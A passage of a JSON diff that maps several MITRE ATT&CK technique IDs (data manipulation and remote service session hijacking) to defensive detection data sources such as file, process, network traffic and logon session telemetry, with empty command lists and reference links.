"Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1565.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api 
execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1565", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1563.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being 
created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + 
"data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1563", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + 